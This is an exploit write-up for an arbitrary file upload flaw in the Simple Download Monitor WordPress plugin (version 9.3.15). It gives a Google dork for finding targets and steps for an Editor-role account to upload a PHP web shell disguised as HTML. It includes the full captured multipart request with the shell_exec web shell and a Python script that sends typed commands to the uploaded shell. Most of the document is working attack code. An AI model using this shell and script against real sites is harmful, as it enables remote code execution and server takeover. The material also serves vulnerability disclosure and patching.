# Exploit Title: Arbritrary File Upload - Privilege Escalation: The Editor can bypass extension allowed this can lead to RCE # Google Dork: inurl:/sdm-downloads/ # Date: 04/01/2023 # Exploit Author: Luth1er # Vendor Homepage: https://simple-download-monitor.com/ # Software Link: https://downloads.wordpress.org/plugin/simple-download-monitor.zip # Version: 9.3.15 The Editor can ignore extensions allowed by the plugin and send shell code in php. Step to reproduce: 1 - Login in the editor account 2 - go to add new sdm-downloads post. 3 - go to downloadable file , open the burpsuite and capture this request. 4 - choose your php webshell, after that you need change the file header for html in the request. POST http://localhost/wp-admin/async-upload.php Accept */* Accept-Encoding gzip, deflate, br Accept-Language : en-US,en;q=0.5 Connection : keep-alive Content-Length : 822 Content-Type : multipart/form-data; boundary=---------------------------42010083933333799326780521202 Cookie : wordpress_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C5250a3994bfb10de1601bbc2243e838191e8ff24b815a9875190bc8b23837d99; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dfile%26align%3Dcenter%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1672804801; wp_wpfileupload_86a9106ae65537651a8e456835b316ab=f8M5gaey5s2Y9AbpOheTm1ymwc9Waqta; PHPSESSID=002lmr7b4084cao099npqhspnb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C08158594f72785ab694bfe58473e905d74d352ff23956c602fd739eff55fbd0b; wp_lang=en_US Host : localhost Origin : http://localhost Referer : http://localhost/wp-admin/post.php?post=145&action=edit Sec-Fetch-Dest : empty Sec-Fetch-Mode : cors Sec-Fetch-Site : same-origin User-Agent : Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 -----------------------------42010083933333799326780521202 Content-Disposition: form-data; name="name" webshell.html -----------------------------42010083933333799326780521202 Content-Disposition: form-data; name="action" upload-attachment -----------------------------42010083933333799326780521202 Content-Disposition: form-data; name="_wpnonce" bdc1866b26 -----------------------------42010083933333799326780521202 Content-Disposition: form-data; name="auto_watermark" 1 -----------------------------42010083933333799326780521202 Content-Disposition: form-data; name="async-upload"; filename="webshell.html" Content-Type: text/html <html> <?php $command = $_GET['cmd']; $command = shell_exec($command); echo $command; ?> </html> -----------------------------42010083933333799326780521202-- import requests import sys, os os.system('clear') banner = """ /$$ /$$ /$$ /$$ | $$ | $$ | $$ | $$ /$$$$$$$ /$$$$$$$ /$$$$$$/$$$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$_____/ /$$__ $$| $$_ $$_ $$ /$$$$$$ /$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$| $$ /$$__ $$ |____ $$ /$$__ $$ /$$_____/ | $$$$$$ | $$ | $$| $$ \ $$ \ $$|______/| $$ | $$| $$ \ $$| $$ | $$ | $$| $$ \ $$| $$| $$ \ $$ /$$$$$$$| $$ | $$| $$$$$$ \____ $$| $$ | $$| $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$| $$ | $$ /$$__ $$| $$ | $$ \____ $$ /$$$$$$$/| $$$$$$$| $$ | $$ | $$ | $$$$$$$| $$$$$$/| $$$$$/$$$$/| $$ | $$| $$| $$$$$$/| $$$$$$$| $$$$$$$ /$$$$$$$/ |_______/ \_______/|__/ |__/ |__/ \_______/ \______/ \_____/\___/ |__/ |__/|__/ \______/ \_______/ \_______/|_______/ Version: 9.3.15 Privilege escalation: WebShell """ print (banner) while True: exec_payload = input("[+] Payload: ") print ('') if exec_payload == 'exit': break; if exec_payload == 'clear': os.system('clear') else: re = requests.get('http://localhost/wp-content/uploads/2023/01/alert.html?cmd='+exec_payload) print (re.text)